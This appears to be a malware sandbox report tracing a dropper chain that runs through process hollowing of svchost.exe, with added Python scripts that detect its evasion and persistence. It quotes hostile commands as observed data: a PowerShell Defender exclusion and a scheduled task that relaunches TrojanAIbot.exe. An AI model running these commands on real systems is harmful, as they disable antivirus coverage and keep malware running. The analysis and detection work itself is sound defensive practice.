Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97109
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96872
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96750
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96599
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199790
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199683
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199484
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199375
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 1199265
Source: C:\Users\user\AppData\Local\Temp\build.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\build.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
Source: x.exe, 00000004.00000002.1566684491.0000000000A08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\3
Source: x.exe, 00000009.00000002.1650531483.0000000000928000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\K
Source: C:\Users\user\AppData\Local\Temp\x.exe API call chain: ExitProcess graph end node graph_2-86878
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_0045A370 BlockInput
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_0040EBD0 LoadLibraryA,GetProcAddress
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_047392F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_04739290 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_04737C50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_04844500 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_04845BA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_04845B40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 6_2_04937518 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 6_2_049374B8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 6_2_04935E78 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 9_2_04B5C4B8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 9_2_04B5C518 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 9_2_04B5AE78 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 13_2_04B5B4B8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 13_2_04B5B518 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 13_2_04B59E78 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 15_2_049A9518 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 15_2_049A94B8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 15_2_049A7E78 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_0050B794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00F71130 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00FB3F3D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_0041F250 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_0041F250 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_0040160F SetUnhandledExceptionFilter
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00FB1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00FB4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: page read and write | page guard
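The sleep and WMI rows above are what a triage script has to reason about: the repeated 96 to 100 s and roughly 1200 s waits on neworigin.exe TID 5696, the 922337203685477 value (the .NET TimeSpan.MaxValue expressed in milliseconds, an unbounded wait rather than a measurable delay, with the even larger build.exe value looking like an overflowed variant of the same), and the Win32_BaseBoard / Win32_Processor queries used for hardware fingerprinting. The following Python is an added example, not Joe Sandbox code: it parses "Source:" rows in the raw form shown on this page, aggregates waits per thread, and flags time-based evasion and WMI VM fingerprinting. The sample rows are copied from this report; the 30 s and 10 min thresholds and the list of fingerprinting classes are assumptions.

```python
import re
from collections import defaultdict

# .NET TimeSpan.MaxValue in milliseconds (Int64.MaxValue ticks / 10000).  A wait of
# this length, or an overflowed value beyond it, is an unbounded wait rather than a
# measurable delay, so it is counted separately from real sleeps.
DOTNET_MAX_SLEEP_MS = 922_337_203_685_477

# Assumed thresholds (not from the report): one wait above 30 s, or more than
# 10 min accumulated on a single thread, is treated as sandbox-timeout evasion.
SINGLE_SLEEP_MS = 30_000
CUMULATIVE_SLEEP_MS = 600_000

# WMI classes commonly read to fingerprint hypervisors (assumed list).
VM_FINGERPRINT_CLASSES = {
    "Win32_BaseBoard", "Win32_BIOS", "Win32_ComputerSystem", "Win32_DiskDrive",
    "Win32_NetworkAdapter", "Win32_Processor", "Win32_VideoController",
}

# Rows are matched in the raw extracted form, where the process path, TID and
# observation may run together without a separator.
SLEEP_RE = re.compile(
    r"Source:\s*(?P<proc>\S+?\.exe)\s*TID:\s*(?P<tid>\d+)\s*"
    r"Thread sleep time:\s*-?(?P<ms>\d+)s")
WMI_RE = re.compile(
    r"Source:\s*(?P<proc>\S+?\.exe)\s*WMI Queries:.*?(?P<cls>Win32_\w+)")

# Constructed sample: rows copied from this report's evasion section.
SAMPLE = [
    r"Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 6820Thread sleep time: -922337203685477s >= -30000sJump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -200000s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -99890s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -1200000s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 5696Thread sleep time: -1199790s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 2648Thread sleep time: -11068046444225724s >= -30000s",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5208Thread sleep count: 8842 > 30",
    r"Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 4676Thread sleep time: -200760000s >= -30000s",
    r"Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 4676Thread sleep time: -386580000s >= -30000s",
    r"Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard",
    r"Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor",
    r"Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor",
]


def basename(path):
    return path.rsplit("\\", 1)[-1]


def triage(lines):
    """Aggregate waits per (process, TID) and WMI classes per process, then
    return the raw records together with human-readable findings."""
    sleep = defaultdict(lambda: {"count": 0, "total_ms": 0, "max_ms": 0, "sentinel": 0})
    wmi = defaultdict(set)
    for line in lines:
        m = SLEEP_RE.search(line)
        if m:
            rec = sleep[(basename(m["proc"]), int(m["tid"]))]
            ms = int(m["ms"])
            rec["count"] += 1
            if ms >= DOTNET_MAX_SLEEP_MS:
                rec["sentinel"] += 1          # unbounded or overflowed wait
            else:
                rec["total_ms"] += ms
                rec["max_ms"] = max(rec["max_ms"], ms)
            continue
        m = WMI_RE.search(line)
        if m:
            wmi[basename(m["proc"])].add(m["cls"])

    findings = []
    for (proc, tid), rec in sorted(sleep.items()):
        if rec["sentinel"] or rec["max_ms"] > SINGLE_SLEEP_MS or rec["total_ms"] > CUMULATIVE_SLEEP_MS:
            findings.append(
                f"{proc} TID {tid}: time-based evasion ({rec['count']} waits, "
                f"max {rec['max_ms']} ms, total {rec['total_ms']} ms, "
                f"{rec['sentinel']} unbounded)")
    for proc, classes in sorted(wmi.items()):
        hit = sorted(classes & VM_FINGERPRINT_CLASSES)
        if hit:
            findings.append(f"{proc}: VM fingerprinting via WMI {', '.join(hit)}")
    return {"sleep": dict(sleep), "wmi": {p: sorted(c) for p, c in wmi.items()},
            "findings": findings}


if __name__ == "__main__":
    for finding in triage(SAMPLE)["findings"]:
        print(finding)
```

Counting the TimeSpan.MaxValue sentinel separately matters: summing it into the total would dwarf every real delay and hide the fact that neworigin.exe also chains dozens of real 100 s and 1200 s waits, which is the behaviour a sandbox with a fixed timeout actually has to defeat.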

                                HIPS / PFW / Operating System Protection Evasion

                                Source: C:\Windows\System32\wscript.exeFile created: x.exe.1.drJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B86008Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00436CD7 LogonUserW,2_2_00436CD7
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,2_2_0040D590
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00434418
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,2_2_0043333C
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 03:26 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp6964.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
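The "Process created" rows above are the whole execution chain in one place: wscript.exe launches x.exe from %TEMP%; x.exe spawns a SysWOW64\svchost.exe whose command line is x.exe's own path (an image/command-line mismatch, the usual footprint of a hollowed process); that svchost.exe drops server_BTC.exe, neworigin.exe and build.exe; and server_BTC.exe adds a Defender exclusion for Roaming\ACCApi, registers a daily scheduled task for TrojanAIbot.exe inside that excluded directory, starts it, and runs a temporary .cmd via cmd.exe and timeout. The following is an added example, not part of the Joe Sandbox report: a Python detection pass that parses those rows (copied from the report as sample input; the same fields are ParentImage, Image and CommandLine in Sysmon event 1 or Security event 4688) and applies the checks a SOC engineer would want, including the cross-event correlation "a binary executed from a path that an earlier PowerShell command excluded from Defender". The rule names, the user-writable path heuristic and the services.exe parent expectation for svchost.exe are this example's own assumptions.

```python
"""Detection pass over Windows process-creation events (added example)."""
import re
from dataclasses import dataclass

# Sample input: the "Process created" rows from the sandbox report above.
# Format: "Source: <parent image> Process created: <image> <command line>"
REPORT_ROWS = [
    r'Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"',
    r'Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"',
    r'Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"',
    r'Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"',
    r'Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"',
    r"""Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'""",
    r'Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 03:26 /du 23:59 /sc daily /ri 1 /f',
    r'Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"',
    r'Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp6964.tmp.cmd""',
    r'Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 6',
]


@dataclass
class ProcEvent:
    parent: str
    image: str
    cmdline: str


ROW_RE = re.compile(r"^Source:\s*(?P<parent>.+?)\s*Process created:\s*(?P<image>\S+)\s*(?P<cmd>.*)$")

# Assumption of this example: directories an unprivileged user can write to.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")


def parse_rows(rows):
    """Turn report rows into events; rows that do not match the format are skipped."""
    events = []
    for row in rows:
        m = ROW_RE.match(row.strip())
        if m:
            events.append(ProcEvent(m["parent"], m["image"], m["cmd"].strip()))
    return events


def is_user_writable(path: str) -> bool:
    return any(tok in path.lower() for tok in USER_WRITABLE)


def stem(path: str) -> str:
    """Lower-case file name without a trailing .exe, for image vs command-line comparison."""
    name = path.replace("/", "\\").rsplit("\\", 1)[-1].lower().strip('"')
    return name[:-4] if name.endswith(".exe") else name


def first_token(cmdline: str) -> str:
    m = re.match(r'\s*"*([^"\s]+)', cmdline)
    return m.group(1) if m else ""


def detect(events):
    """Apply the rules in event order; returns (rule name, image path) pairs."""
    hits = []
    excluded = []  # Defender exclusion paths seen so far, for cross-event correlation
    for ev in events:
        parent, image, cmd = stem(ev.parent), stem(ev.image), ev.cmdline
        low = cmd.lower()
        # A script host writing and running a PE from a user-writable directory.
        if parent in ("wscript", "cscript") and ev.image.lower().endswith(".exe") and is_user_writable(ev.image):
            hits.append(("script_host_drops_exe", ev.image))
        # svchost.exe is normally started by services.exe only.
        if image == "svchost" and parent != "services":
            hits.append(("svchost_unexpected_parent", ev.image))
        # The command line names a different binary than the image: hollowing footprint.
        tok = first_token(cmd)
        if tok and stem(tok) != image:
            hits.append(("image_cmdline_mismatch", ev.image))
        # Defender exclusion tampering; remember the excluded path for later events.
        if image == "powershell" and "add-mppreference" in low and "-exclusion" in low:
            hits.append(("defender_exclusion_added", ev.image))
            m = re.search(r"-ExclusionPath\s+(?:'([^']+)'|\"([^\"]+)\"|(\S+))", cmd, re.I)
            if m:
                excluded.append((m.group(1) or m.group(2) or m.group(3)).lower().rstrip("\\") + "\\")
        # Scheduled task whose action lives in a user-writable directory.
        if image == "schtasks" and "/create" in low:
            m = re.search(r'/tr\s+(?:"([^"]+)"|(\S+))', cmd, re.I)
            target = (m.group(1) or m.group(2)) if m else ""
            if is_user_writable(target):
                hits.append(("schtasks_user_writable_target", ev.image))
        # cmd.exe running a batch file dropped in a user-writable directory.
        if image == "cmd":
            m = re.search(r'/c\s+"*([^"]+\.(?:cmd|bat))', cmd, re.I)
            if m and is_user_writable(m.group(1)):
                hits.append(("cmd_runs_temp_script", ev.image))
        # Anything executed from a directory that was excluded from Defender earlier.
        if any(ev.image.lower().startswith(p) for p in excluded):
            hits.append(("exec_from_excluded_path", ev.image))
    return hits


if __name__ == "__main__":
    for rule, image in detect(parse_rows(REPORT_ROWS)):
        print(f"{rule:32} {image}")
```

On the report rows this yields seven hits across the chain; the two that do the most work in production are the image/command-line mismatch on svchost.exe and the correlation between the Add-MpPreference exclusion and the later execution of TrojanAIbot.exe from inside it, since neither depends on the file names this sample happens to use.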
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 2_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,2_2_00446124
Source: C:\Windows\SysWOW64\svchost.exe Code function: 16_2_00F98550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,16_2_00F98550
Source: x.exe Binary or memory string: Shell_TrayWnd
Source: wscript.exe, 00000001.00000003.1495166445.00000192DDBA3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1494715225.00000192E02E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1488192028.00000192E02E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Users\user\AppData\Local\Temp\build.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
